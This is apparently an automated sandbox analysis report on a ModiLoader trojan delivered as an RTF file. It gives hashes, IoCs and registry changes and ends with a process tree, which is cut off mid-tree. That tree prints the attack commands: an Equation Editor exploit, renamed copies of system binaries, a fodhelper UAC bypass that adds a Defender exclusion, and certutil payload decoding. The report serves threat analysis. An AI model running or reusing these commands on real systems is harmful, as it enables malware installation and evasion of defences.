modiloader | 1b7b82e7a0b9e281efd1e04e989e02b71ffda8b3e347e7da396f317d795f0bcf

Analysis

max time kernel
138s
max time network
136s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
19/03/2024, 09:37

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

1840220197_0000223948__F.rtf
Size

13KB
MD5

1edcf5f787ca137fe762e46ec765e6ef
SHA1

0a10051c51b6eba3f18f055229021920121636e5
SHA256

1b7b82e7a0b9e281efd1e04e989e02b71ffda8b3e347e7da396f317d795f0bcf
SHA512

69f79542131721468decf88ae8ed3a9858216791bb8dacbdead3c79dc02f83ea89620cf6386710d4a7835ecf0dde0b58b748d0e1b243a88cef36bc3293516bd2
SSDEEP

384:TZ17c8JZFweYcPxugxmFEHNHuc8JCqVUrnyUyo8dfkA6PQMug+RZV:V17hJZSeVPxu7FEpN8JCqMy1okkAK7uj

Score

10^/10

modiloader trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

ModiLoader Second Stage 1 IoCs

resource	yara_rule
behavioral1/memory/1644-67-0x0000000003040000-0x0000000004040000-memory.dmp	modiloader_stage2

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	2520	EQNEDT32.EXE

Executes dropped EXE 16 IoCs

pid	Process
1564	alpha.exe
2440	alpha.exe
2864	alpha.exe
3008	xkn.exe
1452	alpha.exe
2360	alpha.exe
2656	kn.exe
948	alpha.exe
1648	kn.exe
1644	Lewxa.com
1696	alpha.exe
1700	alpha.exe
1800	alpha.exe
2280	alpha.exe
308	alpha.exe
840	alpha.exe

Loads dropped DLL 9 IoCs

pid	Process
2604	cmd.exe
2864	alpha.exe
3008	xkn.exe
3008	xkn.exe
2360	alpha.exe
2604	cmd.exe
2604	cmd.exe
280	WerFault.exe
280	WerFault.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	xkn.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
280	1644	WerFault.exe	47

Office loads VBA resources, possible macro or embedded object present

Kills process with taskkill 2 IoCs

evasion

pid	Process
1636	taskkill.exe
2644	taskkill.exe

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2520	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users "	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1432	reg.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2740	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
3008	xkn.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3008	xkn.exe
Token: SeDebugPrivilege	1636	taskkill.exe
Token: SeDebugPrivilege	2644	taskkill.exe

Suspicious use of FindShellTrayWindow 13 IoCs

pid	Process
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com

Suspicious use of SendNotifyMessage 13 IoCs

pid	Process
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com
1644	Lewxa.com

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2740	WINWORD.EXE
2740	WINWORD.EXE
2740	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2520 wrote to memory of 2604	2520	EQNEDT32.EXE	29
PID 2520 wrote to memory of 2604	2520	EQNEDT32.EXE	29
PID 2520 wrote to memory of 2604	2520	EQNEDT32.EXE	29
PID 2520 wrote to memory of 2604	2520	EQNEDT32.EXE	29
PID 2604 wrote to memory of 2572	2604	cmd.exe	31
PID 2604 wrote to memory of 2572	2604	cmd.exe	31
PID 2604 wrote to memory of 2572	2604	cmd.exe	31
PID 2604 wrote to memory of 2572	2604	cmd.exe	31
PID 2572 wrote to memory of 2544	2572	cmd.exe	32
PID 2572 wrote to memory of 2544	2572	cmd.exe	32
PID 2572 wrote to memory of 2544	2572	cmd.exe	32
PID 2572 wrote to memory of 2544	2572	cmd.exe	32
PID 2604 wrote to memory of 1564	2604	cmd.exe	33
PID 2604 wrote to memory of 1564	2604	cmd.exe	33
PID 2604 wrote to memory of 1564	2604	cmd.exe	33
PID 2604 wrote to memory of 1564	2604	cmd.exe	33
PID 1564 wrote to memory of 2384	1564	alpha.exe	34
PID 1564 wrote to memory of 2384	1564	alpha.exe	34
PID 1564 wrote to memory of 2384	1564	alpha.exe	34
PID 1564 wrote to memory of 2384	1564	alpha.exe	34
PID 2604 wrote to memory of 2440	2604	cmd.exe	35
PID 2604 wrote to memory of 2440	2604	cmd.exe	35
PID 2604 wrote to memory of 2440	2604	cmd.exe	35
PID 2604 wrote to memory of 2440	2604	cmd.exe	35
PID 2440 wrote to memory of 2448	2440	alpha.exe	36
PID 2440 wrote to memory of 2448	2440	alpha.exe	36
PID 2440 wrote to memory of 2448	2440	alpha.exe	36
PID 2440 wrote to memory of 2448	2440	alpha.exe	36
PID 2604 wrote to memory of 2864	2604	cmd.exe	37
PID 2604 wrote to memory of 2864	2604	cmd.exe	37
PID 2604 wrote to memory of 2864	2604	cmd.exe	37
PID 2604 wrote to memory of 2864	2604	cmd.exe	37
PID 2864 wrote to memory of 3008	2864	alpha.exe	38
PID 2864 wrote to memory of 3008	2864	alpha.exe	38
PID 2864 wrote to memory of 3008	2864	alpha.exe	38
PID 2864 wrote to memory of 3008	2864	alpha.exe	38
PID 3008 wrote to memory of 1452	3008	xkn.exe	41
PID 3008 wrote to memory of 1452	3008	xkn.exe	41
PID 3008 wrote to memory of 1452	3008	xkn.exe	41
PID 3008 wrote to memory of 1452	3008	xkn.exe	41
PID 1452 wrote to memory of 1432	1452	alpha.exe	42
PID 1452 wrote to memory of 1432	1452	alpha.exe	42
PID 1452 wrote to memory of 1432	1452	alpha.exe	42
PID 1452 wrote to memory of 1432	1452	alpha.exe	42
PID 2604 wrote to memory of 2360	2604	cmd.exe	43
PID 2604 wrote to memory of 2360	2604	cmd.exe	43
PID 2604 wrote to memory of 2360	2604	cmd.exe	43
PID 2604 wrote to memory of 2360	2604	cmd.exe	43
PID 2360 wrote to memory of 2656	2360	alpha.exe	44
PID 2360 wrote to memory of 2656	2360	alpha.exe	44
PID 2360 wrote to memory of 2656	2360	alpha.exe	44
PID 2360 wrote to memory of 2656	2360	alpha.exe	44
PID 2604 wrote to memory of 948	2604	cmd.exe	45
PID 2604 wrote to memory of 948	2604	cmd.exe	45
PID 2604 wrote to memory of 948	2604	cmd.exe	45
PID 2604 wrote to memory of 948	2604	cmd.exe	45
PID 948 wrote to memory of 1648	948	alpha.exe	46
PID 948 wrote to memory of 1648	948	alpha.exe	46
PID 948 wrote to memory of 1648	948	alpha.exe	46
PID 948 wrote to memory of 1648	948	alpha.exe	46
PID 2604 wrote to memory of 1644	2604	cmd.exe	47
PID 2604 wrote to memory of 1644	2604	cmd.exe	47
PID 2604 wrote to memory of 1644	2604	cmd.exe	47
PID 2604 wrote to memory of 1644	2604	cmd.exe	47

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1840220197_0000223948__F.rtf"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2740
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2472

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\ProgramData\Veevsruh.bat" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2604
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2572
  - - C:\Windows\SysWOW64\extrac32.exe
      extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
      4⤵
      PID:2544
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1564
  - - C:\Windows\SysWOW64\extrac32.exe
      extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
      4⤵
      PID:2384
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2440
  - - C:\Windows\SysWOW64\extrac32.exe
      extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      4⤵
      PID:2448
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2864
  - - C:\Users\Public\xkn.exe
      C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3008
    - - C:\Users\Public\alpha.exe
        
        "C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1452
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
        6⤵
        Modifies registry class
        Modifies registry key
        
        PID:1432
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\ProgramData\Veevsruh.bat" "C:\\Users\\Public\\Lewxa.txt" 9
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2360
  - - C:\Users\Public\kn.exe
      C:\\Users\\Public\\kn -decodehex -F "C:\ProgramData\Veevsruh.bat" "C:\\Users\\Public\\Lewxa.txt" 9
      4⤵
      Executes dropped EXE
      PID:2656
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:948
  - - C:\Users\Public\kn.exe
      C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
      4⤵
      Executes dropped EXE
      PID:1648
- - C:\Users\Public\Libraries\Lewxa.com
    C:\\Users\\Public\\Libraries\\Lewxa.com
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1644
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1644 -s 776
      4⤵
      Loads dropped DLL
      Program crash
      PID:280
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
    3⤵
    - Executes dropped EXE
    PID:1696
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
    3⤵
    - Executes dropped EXE
    PID:1700
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
    3⤵
    - Executes dropped EXE
    PID:1800
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
    3⤵
